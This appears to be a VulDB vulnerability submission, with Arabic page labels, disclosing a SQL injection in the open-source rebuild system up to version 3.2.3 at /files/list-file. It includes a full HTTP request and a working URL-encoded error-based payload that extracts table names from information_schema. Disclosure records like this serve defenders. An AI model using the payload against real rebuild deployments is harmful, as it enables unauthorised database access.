| عنوان | SQL injection vulnerability exists in the /files/list-file interface of the rebuild system |
|---|
| الوصف | Suggested description:
sql injection vulnerability exists in rebuild <=3.2.3.
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
Vulnerability Type:
SQLi
Vendor of Product:
https://github.com/getrebuild/rebuild
Affected Product Code Base:
<=3.2.3
Affected Component:
/files/list-file
Attack Type:
Remote
Request message:
```
GET /files/list-file?entry=1&sort=&q=1&pageNo=1&pageSize=40&_=1679238611579 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/files/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rb.lastFilesPath=attachment; _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679238611.9.1.1679238613.0.0.0
Connection: close
```
payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20--+ |
|---|
| المصدر | ⚠️ https://github.com/getrebuild/rebuild/issues/598 |
|---|
| المستخدم | Mechoy (UID 41579) |
|---|
| ارسال | 19/03/2023 06:27 PM (3 سنوات منذ) |
|---|
| الاعتدال | 23/03/2023 07:44 PM (4 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 223743 [Rebuild حتى 3.2.3 /files/list-file حقن SQL] |
|---|
| النقاط | 20 |
|---|